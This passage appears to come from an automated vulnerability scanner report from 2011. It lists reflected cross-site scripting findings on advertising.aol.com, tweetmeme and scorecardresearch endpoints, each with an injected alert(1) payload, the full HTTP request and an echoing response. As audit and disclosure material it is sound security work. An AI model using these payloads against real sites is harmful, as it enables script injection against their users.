s_265.linkInternalFilters="javascrip
...[SNIP]...

6.78. http://advertising.aol.com/token/5/3/803328935/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/5/3/803328935/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6958e"-alert(1)-"433e65134d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /6958e"-alert(1)-"433e65134d/5/3/803328935/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:49:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:49:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6958e"-alert(1)-"433e65134d/5/3/803328935/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.79. http://advertising.aol.com/token/6/1/737485457/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/1/737485457/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 615c2"-alert(1)-"fa11a1a72a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /615c2"-alert(1)-"fa11a1a72a0/6/1/737485457/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/615c2"-alert(1)-"fa11a1a72a0/6/1/737485457/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.80. http://advertising.aol.com/token/6/3/807811660/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/6/3/807811660/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2eae"-alert(1)-"175f56d7e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /a2eae"-alert(1)-"175f56d7e11/6/3/807811660/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:50:48 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:50:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/a2eae"-alert(1)-"175f56d7e11/6/3/807811660/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.81. http://advertising.aol.com/token/7/1/585611182/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/1/585611182/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89719"-alert(1)-"a97c2ea54f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /89719"-alert(1)-"a97c2ea54f5/7/1/585611182/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:27 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/89719"-alert(1)-"a97c2ea54f5/7/1/585611182/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.82. http://advertising.aol.com/token/7/3/1807570122/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/7/3/1807570122/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26169"-alert(1)-"29c976540da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /26169"-alert(1)-"29c976540da/7/3/1807570122/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:50:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:50:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/26169"-alert(1)-"29c976540da/7/3/1807570122/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.83. http://advertising.aol.com/token/8/1/592246145/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/1/592246145/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9dd"-alert(1)-"568cf44b4ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /6c9dd"-alert(1)-"568cf44b4ef/8/1/592246145/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:57 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6c9dd"-alert(1)-"568cf44b4ef/8/1/592246145/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

6.84. http://advertising.aol.com/token/8/3/1337747048/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://advertising.aol.com
Path:	/token/8/3/1337747048/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 210f6"-alert(1)-"9cf4537fd54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /210f6"-alert(1)-"9cf4537fd54/8/3/1337747048/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:51:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:51:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/210f6"-alert(1)-"9cf4537fd54/8/3/1337747048/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

6.85. http://api.tweetmeme.com/v2/follow.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://api.tweetmeme.com
Path:	/v2/follow.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d62cf<a>46058332c53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /v2d62cf<a>46058332c53/follow.js?screen_name=ProfitNDTV&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:39:19 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h03
Content-Length: 101

tweetmemedata({"status":"failure","reason":"unknown class of API call [api_v2d62cf<a>46058332c53]"});

6.86. http://api.tweetmeme.com/v2/follow.js [screen_name parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/v2/follow.js

Issue detail

The value of the screen_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37866"><script>alert(1)</script>cecc64bffc0 was submitted in the screen_name parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/follow.js?screen_name=ProfitNDTV37866"><script>alert(1)</script>cecc64bffc0&style=normal HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:39 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h02
Content-Length: 2714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <title>TweetMeme F
...[SNIP]...
<a class="profile_image" href="http://twitter.com/ProfitNDTV37866"><script>alert(1)</script>cecc64bffc0" title="View Profile On Twitter">
...[SNIP]...

6.87. http://api.tweetmeme.com/v2/follow.js [style parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/v2/follow.js

Issue detail

The value of the style request parameter is copied into the HTML document as plain text between tags. The payload b846e<script>alert(1)</script>6b69e2d3a59 was submitted in the style parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/follow.js?screen_name=ProfitNDTV&style=normalb846e<script>alert(1)</script>6b69e2d3a59 HTTP/1.1
Host: api.tweetmeme.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/NDTVProfit
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 03:38:49 GMT
Content-Type: text/html
Connection: close
P3P: CP="CAO PSA"
X-Served-By: h04
Content-Length: 69

normalb846e<script>alert(1)</script>6b69e2d3a59 is not a valid style.

6.88. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 197ba<script>alert(1)</script>2e3c3b8e2de was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8197ba<script>alert(1)</script>2e3c3b8e2de&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:40:57 GMT
Date: Sun, 04 Sep 2011 02:40:57 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8197ba<script>alert(1)</script>2e3c3b8e2de", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

6.89. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload d00a9<script>alert(1)</script>7e4cf8a89f7 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=d00a9<script>alert(1)</script>7e4cf8a89f7&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:12 GMT
Date: Sun, 04 Sep 2011 02:41:12 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"d00a9<script>alert(1)</script>7e4cf8a89f7", c15:"", c16:"", r:""});

6.90. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 28839<script>alert(1)</script>d30932a9a0c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=28839<script>alert(1)</script>d30932a9a0c HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:14 GMT
Date: Sun, 04 Sep 2011 02:41:14 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"28839<script>alert(1)</script>d30932a9a0c", c16:"", r:""});

6.91. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 61a67<script>alert(1)</script>770386f5374 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=686432261a67<script>alert(1)</script>770386f5374&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:00 GMT
Date: Sun, 04 Sep 2011 02:41:00 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"686432261a67<script>alert(1)</script>770386f5374", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

6.92. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload c09f3<script>alert(1)</script>0f05b6d2d69 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=c09f3<script>alert(1)</script>0f05b6d2d69&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
